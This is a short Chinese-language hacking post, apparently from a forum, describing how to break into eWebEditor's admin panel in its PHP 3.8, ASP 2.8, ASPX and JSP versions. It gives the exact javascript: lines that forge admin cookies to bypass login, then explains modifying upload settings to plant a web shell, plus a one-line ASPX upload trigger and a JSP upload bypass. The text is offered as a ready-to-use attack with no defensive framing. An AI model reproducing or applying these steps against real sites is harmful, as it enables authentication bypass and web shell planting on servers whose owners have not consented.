php版ewebeditor 3.8的漏洞

php版本後臺是調用../ewebeditor/admin/config.php,大家去看下源碼就知道，在這裏我說說利用方法:

1 首先當然要找到登陸後臺,默認是../eWebEditor/admin/login.php,進入後臺後隨便輸入一個用戶和密碼,當然會提示出錯了,必 須是出錯的時候，然後這時候你清空瀏覽器的url,然後輸入 javascript:alert(document.cookie=”adminuser=”+escape(”admin”)); javascript:alert(document.cookie=”adminpass=”+escape(”admin”)); javascript:alert(document.cookie=”admindj=”+escape(”1″));後三次回車,
2 然後輸入正常情況才能訪問的文件../ewebeditor/admin/default.php就可以進後臺了

3 後面的利用和asp一樣,新增樣式修改上傳,就ok了

測試一下asp 2.8版本的,竟然一樣可以用,爽,看來asp版的應該可以通殺(只測試2.8的,貌似2.8是最高版本的)
aspx的版本../ewebeditor/admin/upload.aspx添好本地的cer的Shell文件,在瀏攬器輸入javascript:lbtnUpload.click();就能得到shell
jsp的上傳漏洞以及那個出了N久了,由於沒有上傳按鈕,選擇好要上傳的shell,直接回車就可以了